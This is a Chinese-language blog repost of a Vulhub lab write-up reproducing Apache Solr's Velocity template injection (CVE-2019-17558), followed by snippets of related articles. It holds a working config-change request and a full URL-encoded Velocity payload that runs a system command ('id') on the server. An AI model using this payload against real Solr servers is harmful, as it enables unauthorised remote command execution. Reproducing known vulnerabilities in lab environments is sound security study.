apache solr velocity 注入远程命令执行漏洞 (cve-2019-17558)

最新推荐文章于 2024-05-16 05:42:04 发布
最新推荐文章于 2024-05-16 05:42:04 发布
阅读量1.2k 收藏
点赞数
原文链接:https://github.com/vulhub/vulhub/blob/master/solr/CVE-2019-17558/README.zh-cn.md
版权

Apache Solr 是一个开源的搜索服务器。

在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。

具体漏洞原理和POC可以参考:

漏洞环境

执行如下命令启动一个Apache Solr 8.2.0服务器:

docker-compose up -d

服务启动后,访问http://your-ip:8983即可查看到一个无需权限的Apache Solr服务。

漏洞复现

默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心:

http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json

Vulhub里唯一的核心是demo

 

通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称:

POST /solr/demo/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

之后,注入Velocity模板即可执行任意命令:

http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

 

 

 

whatday
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
solr 远程命令执行 (CVE-2019-17558)
YouthBelief的博客
11-01 4740
solr 远程命令执行 (CVE-2019-17558前言一、solr 远程命令执行 (CVE-2019-17558)0x01 漏洞描述0x02 影响范围0x03 漏洞利用直接用脚本0x04 漏洞修复 前言 Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。VelocityApache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 一、solr 远程命令执行 (CVE-2019-175
漏洞复现----4、Apache Solrvelocity远程命令执行(CVE-2019-17558)
七天
11-26 1585
文章目录一、Apache Solr 简介二、CVE-2019-17558简介三、漏洞复现 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Apache Solr下载安装 二、CVE-2019-17558简介 在Ap
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
最新发布
2401_84545618的博客
05-16 568
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Apache Solr Velocity注入远程命令执行(CVE-2019-17558)
m0_65150886的博客
02-27 452
2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启params.resource.loader.enabled,然后通过get请求访问接口导致服务器命令执行。2.默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心。3.通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称。
Apache Solr任意文件读取漏洞复现
deng_menglihua的博客
03-19 2589
Apache Solr 任意文件读取漏洞 一.漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 二.影响版本 Apache Solr <= 8.8.1 三.漏洞复现 1.搭环境 下载Solr https://mirrors.ukfast.co.uk/sites/ftp.apache.org/lucene/solr/8.8.1/solr-8.8.1.tgz 也使用fofa大法,搜索 app=“Solr” 访问目标 2.获取core的信息 访问
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。...文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
Apache Tomcat CVE-2019-0232 远程代码执行漏洞 - tdcoming'blog QQ group 90
08-04
背景:近日,ApacheSolr官方团队在最新的安全更新中披露了一则ApacheSolrDeserialization远程代…阅读数 1386557篇文章排名:
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Velocity自定义标签无法注入spring的Service解决办法
02-12
用springMVC+velocity时,当使用自定义标签,发现自定义标签无法注入spring的其它服务类,归根源码发现,velocity的源码中有一段,有一段代码永远获取的是新实例。所以,把这个地方的源码改了,所以使用这个的时候,已经不是原版的velocity,这个问题很久以前就解决了,最近看velocity又开始重新维护,版本为2.0,以为会解决这个问题,一看,还是没有,所以我还是发布出来吧该版本在1.7版本上做的,如果使用2.0版本的功能,这个是不满足的。这个过程我有两个地方改动。请参照jar包里的说明。
Java安全之Velocity模版注入
Huangjiazhen711的博客
09-22 1721
我们提供了五条基本的模板脚本语句,基本上就能满足所有应用模板的要求。Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。这是我们不希望的,为了把不存在的变量或变量值为null的对象显示为空白,则只需要在变量名前加一个“!如:在EasyJWeb各种开源应用中,我们经常看到的用于弹出提示信息msg的例子。在html标签中显示经过HtmlUtil对象处理过后的msg对象的值。,其中涉及到了ast的处理,感兴趣的师傅可以自己跟下看看。
vulfocus——solr远程命令执行(CVE-2019-17558)
m0_62063669的博客
09-11 821
Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。Velocity是一个基于Java的模板引擎,可以通过特定的语法获取在java对象的数据,填充到模板中,从而实现界面和java代码的分离。2.访问页面默认会有一个叫demo的core。4.注入Velocity模板即可执行任意命令
Apache Solr漏洞总结(比较全面的哦)
热门推荐
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行CVE-2019-17558漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.未授权
Apache Solr Velocity远程命令执行漏洞CVE-2019-17558
whojoe的博客
07-06 1283
Apache Solr Velocity远程命令执行漏洞CVE-2019-17558)前言环境搭建漏洞复现参考文章 前言 影响Apache Solr 8.1.1到8.2.0版本 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2019-17558/ 启动容器 docker
Apache Velocity漏洞CVE-2020-13936修复记录
qq_24380005的博客
04-07 7842
这里写自定义目录标题Apache Velocity漏洞CVE-2020-13936修复记录升级jar包即可一、velocity在1.7以后换名字了二、velocity2.3的升级需要jdk1.8附录 Apache Velocity漏洞CVE-2020-13936修复记录 最近由于某些懂得都懂的原因,我们在疯狂的修复漏洞,近期发现了一个Apache Velocity漏洞,声称如果Velocity版本在2.2及以下时,会有被通过模板攻击的危险。 升级jar包即可 有两个问题需要注意一下 一、velocity
Apache Solr Velocity模版注入远程命令执行漏洞
weixin_42372877的博客
11-01 536
0x01漏洞概述 2019年10月末,GitHub代码中安全研究员S00pY发布一个Apache Solr Velocity模版注入远程命令执行POC,发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core...
cve-2019-6520编写poc
05-25
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。 下面是一个简单的Python脚本,可以利用该漏洞读取指定文件: ```python import requests url = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值